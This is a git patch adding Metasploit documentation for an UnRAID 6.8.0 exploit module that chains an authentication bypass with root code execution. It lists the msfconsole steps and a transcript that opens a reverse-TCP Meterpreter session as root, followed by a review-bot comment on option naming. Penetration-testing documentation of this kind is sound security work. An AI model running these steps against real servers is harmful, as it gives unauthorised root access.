From 4975b8d89444ca302bdf290dcfa53ae967f264f6 Mon Sep 17 00:00:00 2001 From: Nicolas Chatelain Date: Fri, 20 Mar 2020 15:33:20 +0100 Subject: [PATCH] Add unraid exploit documentation --- .../modules/exploit/linux/http/unraid_eval.md | 45 +++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/unraid_eval.md diff --git a/documentation/modules/exploit/linux/http/unraid_eval.md b/documentation/modules/exploit/linux/http/unraid_eval.md new file mode 100644 index 0000000000..155b88728e --- /dev/null +++ b/documentation/modules/exploit/linux/http/unraid_eval.md 
@@ -0,0 +1,45 @@ +## Vulnerable Application + +This module has been tested on UnRAID 6.8.0 without any configuration except setting a root password. + +### Description + +This module exploits an authentication bypass vulnerability caused by an insecure whitelisting mechanism in `auth_request.php` and then +performs remote code execution as root by abusing the *extract* function used in the `template.php` file. + +### Testing Environment + +Setup [Unraid 6.8.0](https://s3.amazonaws.com/dnld.lime-technology.com/stable/unRAIDServer-6.8.0-x86_64.zip) +according to the [UnRAID Getting Started](https://wiki.unraid.net/UnRAID_6/Getting_Started) guide. + +## Verification Steps + + 1. Setup UnRAID 6.8.0 + 2. Start `msfconsole` + 3. `use exploit/linux/http/unraid_eval` + 4. `set RHOST [UNRAID]` + 5. `check` + 6. `run` + 7. You should get a new *root* session + +## Options + +None. + +## Scenarios + +``` +msf5 > use exploit/linux/http/unraid_eval +msf5 exploit(linux/http/unraid_eval) > set RHOSTS 10.10.0.173 +RHOSTS => 10.10.0.173 +msf5 exploit(linux/http/unraid_eval) > check +[*] 10.10.0.173:80 - The target appears to be vulnerable. +msf5 exploit(linux/http/unraid_eval) > run + +[*] Started reverse TCP handler on 10.10.0.161:4444 +[*] Sending stage (38288 bytes) to 10.10.0.173 +[*] Meterpreter session 1 opened (10.10.0.161:4444 -> 10.10.0.173:46894) at 2020-03-20 15:26:40 +0100 + +meterpreter > getuid +Server username: root (0) +```
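Review bot: the Verification Steps and the Scenarios block disagree on the option name: step 4 says `set RHOST [UNRAID]` while the console transcript uses `set RHOSTS 10.10.0.173` (`RHOSTS => 10.10.0.173`), so step 4 should read `set RHOSTS [UNRAID]` to match the module's actual datastore option. Also consider stating in "Vulnerable Application" which UnRAID versions are affected and whether a fixed release exists, since only "tested on UnRAID 6.8.0" is given, and "Setup" as a verb in "Setup UnRAID 6.8.0" and "Setup [Unraid 6.8.0]" should be "Set up".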